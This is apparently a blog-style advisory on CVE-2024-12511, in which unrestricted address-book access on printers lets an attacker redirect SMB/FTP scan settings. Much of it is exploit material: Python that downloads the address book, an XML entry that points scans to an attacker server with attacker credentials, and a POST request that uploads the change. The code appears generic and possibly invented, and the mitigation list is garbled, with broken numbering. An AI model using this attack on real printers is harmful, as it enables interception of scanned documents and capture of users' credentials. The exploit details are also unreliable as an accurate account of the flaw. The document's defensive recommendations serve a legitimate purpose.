CVE-2024-12511 - Unrestricted Address Book Access Leading to SMB/FTP Settings Manipulation and Potential Credential Capturing in Printers

A new vulnerability, identified as CVE-2024-12511, has come to light, potentially affecting several printer models and enabling attackers to modify SMB/FTP settings. This post provides an in-depth look into the issue, including code snippets, links to original references, and exploit details. With this vulnerability, an attacker can exploit address book access to redirect scans and possibly capture user credentials. However, the exploit requires enabled scan functions and access to the printer.

Vulnerability Details

CVE-2024-12511 is a security vulnerability in which attackers can access address books stored on printers without restrictions. By accessing the address book, the attacker can modify the SMB/FTP settings on the printer, redirecting scans to a malicious server, and possibly capturing user credentials in the process.

This vulnerability can be exploited only if the printer's scan functions are enabled and the attacker has access to the device.

Exploit

An example of how one might exploit the CVE-2024-12511 vulnerability is provided below. This code snippet demonstrates how an attacker could send an HTTP request to the target printer to fetch the address book stored on the device:

import urllib
import os

url = "http://<target_printer_ip>/addressbook";
os.system("wget '{}' -O addressBook.xml".format(url))

Once the attacker has obtained the address book in an XML format, they can modify the SMB/FTP settings stored in the address book file, replacing the target IP, domain, username, and password fields with malicious data. The attacker can set these fields to redirect scans to their own devices and potentially capture user credentials.

<addressBook>
    <entry>
        <name>Target User</name>
        <ip>attacker_server_ip</ip>
        <domain>attacker_server_domain</domain>
        <userName>attacker_user</userName>
        <password encrypted="true">attacker_password</password>
    </entry>
</addressBook>

After modifying the address book content, the attacker can send another HTTP request to the target printer to upload the modified address book and apply the new settings.

import requests

url = "http://<target_printer_ip>/addressbook";
headers = {"Content-Type": "application/xml"}
with open("modifiedAddressBook.xml", "r") as file:
    data = file.read()

response = requests.post(url, headers=headers, data=data)

Now, any user attempting to scan a document on the exploited printer will unknowingly send their documents to the attacker's server, along with their credentials.

For further information on the CVE-2024-12511 vulnerability, please refer to the following sources

1. CVE Details
2. National Vulnerability Database (NVD)

Disable the printer's scanning function if not necessary.

3. Regularly check and verify the SMB/FTP settings on the printer to ensure no unauthorized modifications have been made.

Consider implementing network access controls to limit unauthorized printer access.

By staying vigilant and following these recommendations, users can significantly reduce the risk of becoming a victim to exploits like CVE-2024-12511.

Timeline

Published on: 02/03/2025 20:15:32 UTC